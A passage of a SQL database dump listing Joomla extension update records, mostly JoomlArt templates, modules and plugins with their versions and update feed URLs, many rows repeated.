J3.4','','com_jak2filter','component','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3724,11,0,0,'JA K2 Filter Package for J25 & J3.4','','com_jak2filter','component','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3725,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3726,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3727,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3728,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3729,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3730,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3731,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3732,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3733,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3734,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3735,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3736,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3737,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(3738,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(3739,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(3740,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(3741,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(3742,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(3743,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(3744,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(3745,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(3746,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(3747,11,0,0,'JA K2 Filter Module for J25 & J3.4','','mod_jak2filter','module','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(3748,11,0,0,'JA K2 Filter Module for J25 & J3.4','','mod_jak2filter','module','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(3749,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(3750,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(3751,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(3752,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(3753,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(3754,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(3755,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(3756,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(3757,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(3758,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4 beta','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(3759,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(3760,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(3761,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4 beta','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(3762,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(3763,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(3764,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(3765,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(3766,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(3767,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(3768,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(3769,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(3770,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(3771,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(3772,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(3773,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(3774,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(3775,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(3776,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(3777,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(3778,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(3779,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(3780,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(3781,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(3782,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(3783,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(3784,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(3785,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(3786,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(3787,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(3788,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(3789,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(3790,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(3791,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(3792,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(3793,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(3794,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(3795,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(3796,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(3797,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(3798,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(3799,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(3800,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(3801,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(3802,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(3803,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(3804,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(3805,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(3806,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(3807,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(3808,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(3809,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(3810,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(3811,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(3812,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.2 beta','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(3813,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(3814,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.2 beta','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(3815,11,0,0,'Purity III Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml',''),(3816,11,0,0,'Purity III Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml',''),(3817,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.7.1','','http://getk2.org/update.xml',''),(3818,11,0,0,'JA K2 Filter Package for J25 & J3.4','','com_jak2filter','component','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3819,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3820,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3821,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3822,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3823,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3824,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3825,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(3826,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(3827,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(3828,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(3829,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(3830,11,0,0,'JA K2 Filter Module for J25 & J3.4','','mod_jak2filter','module','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(3831,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(3832,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(3833,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(3834,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(3835,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(3836,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4 beta','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(3837,11,0,0,'JA Restaurant Template','','ja_restaurant','template','',0,'1.0.0','','http://update.joomlart.com/service/tracking/j30/ja_restaurant.xml',''),(3838,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(3839,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(3840,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(3841,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(3842,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(3843,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(3844,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(3845,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(3846,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(3847,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(3848,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(3849,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(3850,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(3851,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(3852,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(3853,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(3854,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(3855,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(3856,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(3857,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(3858,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(3859,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(3860,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(3861,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(3862,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(3863,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(3864,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.2 beta','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(3865,11,0,0,'Purity III Template','','purity_iii','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j31/purity_iii.xml',''),(3866,11,0,0,'JA K2 Filter Package for J25 & J3.4','','com_jak2filter','component','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/com_jak2filter.xml',''),(3867,11,0,0,'JA Biz Theme for EasyBlog','','easyblog_theme_biz','custom','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/easyblog_theme_biz.xml',''),(3868,11,0,0,'JA Anion template for Joomla 3.x','','ja_anion','template','',0,'2.5.6','','http://update.joomlart.com/service/tracking/j16/ja_anion.xml',''),(3869,11,0,0,'JA Bookshop Template','','ja_bookshop','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_bookshop.xml',''),(3870,11,0,0,'JA Decor Template','','ja_decor','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_decor.xml',''),(3871,11,0,0,'JA Jason template','','ja_jason','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j16/ja_jason.xml',''),(3872,11,0,0,'JA Medicare Template','','ja_medicare','template','',0,'1.1.7','','http://update.joomlart.com/service/tracking/j16/ja_medicare.xml',''),(3873,11,0,0,'JA Nuevo template','','ja_nuevo','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/ja_nuevo.xml',''),(3874,11,0,0,'JA Playmag Template','','ja_playmag','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j16/ja_playmag.xml',''),(3875,11,0,0,'JA Sugite Template','','ja_sugite','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j16/ja_sugite.xml',''),(3876,11,0,0,'JA Decor Theme for Mijoshop','','mijoshop_theme_decor','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j16/mijoshop_theme_decor.xml',''),(3877,11,0,0,'JA Image Hotspot Module for Joomla 2.5 & 3.4','','mod_jaimagehotspot','module','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j16/mod_jaimagehotspot.xml',''),(3878,11,0,0,'JA K2 Filter Module for J25 & J3.4','','mod_jak2filter','module','',0,'1.2.3','','http://update.joomlart.com/service/tracking/j16/mod_jak2filter.xml',''),(3879,11,0,0,'JA Quick Contact Module for J3.x','','mod_jaquickcontact','module','',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/mod_jaquickcontact.xml',''),(3880,11,0,0,'JA System Social Feed Plugin for Joomla 2.5 & 3.4','','jasocial_feed','plugin','system',0,'1.2.8','','http://update.joomlart.com/service/tracking/j16/plg_system_jasocial_feed.xml',''),(3881,11,0,0,'JA T3v2 System Plugin for J3.x','','jat3','plugin','system',0,'2.7.3','','http://update.joomlart.com/service/tracking/j16/plg_system_jat3.xml',''),(3882,11,0,0,'T3 System Plugin','','t3','plugin','system',0,'2.6.1','','http://update.joomlart.com/service/tracking/j16/plg_system_t3.xml',''),(3883,11,0,0,'Uber Template','','uber','template','',0,'2.1.4','','http://update.joomlart.com/service/tracking/j16/uber.xml',''),(3884,11,0,0,'Backend Template','','backend_template_pkg','template','',0,'1.0.4 beta','','http://update.joomlart.com/service/tracking/j30/backend_template_pkg.xml',''),(3885,11,0,0,'JA Multilingual Component for Joomla 2.5 & 3.4','','com_jalang','component','',0,'1.0.9','','http://update.joomlart.com/service/tracking/j31/com_jalang.xml',''),(3886,11,0,0,'JA Resume Theme for EasyBlog','','easyblog_theme_resume','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_resume.xml',''),(3887,11,0,0,'JA Sugite Theme for EasyBlog','','easyblog_theme_sugite','custom','',0,'1.1.1','','http://update.joomlart.com/service/tracking/j31/easyblog_theme_sugite.xml',''),(3888,11,0,0,'JA Biz Template','','ja_biz','template','',0,'1.1.6','','http://update.joomlart.com/service/tracking/j31/ja_biz.xml',''),(3889,11,0,0,'JA Charity template','','ja_charity','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_charity.xml',''),(3890,11,0,0,'JA Directory Template','','ja_directory','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_directory.xml',''),(3891,11,0,0,'JA Elicyon Template','','ja_elicyon','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_elicyon.xml',''),(3892,11,0,0,'JA Events II template','','ja_events_ii','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_events_ii.xml',''),(3893,11,0,0,'JA Healthcare Template','','ja_healthcare','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_healthcare.xml',''),(3894,11,0,0,'JA Magz II Template','','ja_magz_ii','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_magz_ii.xml',''),(3895,11,0,0,'JA Megastore Template','','ja_megastore','template','',0,'1.0.1','','http://update.joomlart.com/service/tracking/j31/ja_megastore.xml',''),(3896,11,0,0,'JA Mono Template','','ja_mono','template','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/ja_mono.xml',''),(3897,11,0,0,'JA Moviemax Template','','ja_moviemax','template','',0,'1.1.2','','http://update.joomlart.com/service/tracking/j31/ja_moviemax.xml',''),(3898,11,0,0,'JA Platon Template','','ja_platon','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_platon.xml',''),(3899,11,0,0,'JA Playstore Template','','ja_playstore','template','',0,'1.0.3','','http://update.joomlart.com/service/tracking/j31/ja_playstore.xml',''),(3900,11,0,0,'JA Rent template','','ja_rent','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_rent.xml',''),(3901,11,0,0,'JA Resume Template','','ja_resume','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_resume.xml',''),(3902,11,0,0,'JA Social II template','','ja_social_ii','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_social_ii.xml',''),(3903,11,0,0,'JA Techzone Template','','ja_techzone','template','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/ja_techzone.xml',''),(3904,11,0,0,'JA Teline V Template','','ja_teline_v','template','',0,'1.1.0','','http://update.joomlart.com/service/tracking/j31/ja_teline_v.xml',''),(3905,11,0,0,'JA University Template for J25 & J32','','ja_university','template','',0,'1.0.7','','http://update.joomlart.com/service/tracking/j31/ja_university.xml',''),(3906,11,0,0,'JA University T3 template','','ja_university_t3','template','',0,'1.1.5','','http://update.joomlart.com/service/tracking/j31/ja_university_t3.xml',''),(3907,11,0,0,'JA Vintas Template for J25 & J3x','','ja_vintas','template','',0,'1.0.5','','http://update.joomlart.com/service/tracking/j31/ja_vintas.xml',''),(3908,11,0,0,'JA Mitius Kunena Theme for Joomla 3x','','kunena_theme_mitius','custom','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/kunena_theme_mitius.xml',''),(3909,11,0,0,'JA Bookshop Theme for Mijoshop V3','','mijoshop_theme_bookshop_v3','custom','',0,'1.0.2','','http://update.joomlart.com/service/tracking/j31/mijoshop_theme_bookshop_v3.xml',''),(3910,11,0,0,'JA Promo Bar module','','mod_japromobar','module','',0,'1.0.4','','http://update.joomlart.com/service/tracking/j31/mod_japromobar.xml',''),(3911,11,0,0,'JA K2 Data Migration plugin','','plg_jak2tocomcontentmigration','plugin','plg_jak2tocomcontent',0,'1.0.2 beta','','http://update.joomlart.com/service/tracking/j31/plg_jak2tocomcontentmigration.xml',''),(3912,11,0,0,'Purity III 